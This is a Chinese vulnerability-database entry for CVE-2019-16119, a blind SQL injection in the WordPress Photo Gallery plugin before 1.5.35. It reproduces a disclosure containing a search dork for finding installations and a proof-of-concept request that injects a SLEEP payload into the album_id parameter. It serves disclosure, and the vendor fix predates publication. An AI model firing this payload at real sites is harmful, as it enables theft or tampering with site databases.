WordPress photo-gallery插件SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1734480 漏洞类型 SQL注入
发布时间 2019-09-14 更新时间 2019-09-18
CVE编号 CVE-2019-16119 CNNVD-ID CNNVD-201909-279
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201909-279
|漏洞详情
WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。photo-gallery是使用在其中的一个图片库插件。 WordPress photo-gallery(10Web Photo Gallery)插件1.5.35之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
|漏洞EXP
# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap
# CVE : 2019-16119

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from
them.

# POC
In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection.  Following is the POC,

1.   http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc&

2.    http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&


# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119
|参考资料

来源:MISC

链接:https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php


来源:MISC

链接:https://wordpress.org/plugins/photo-gallery/#developers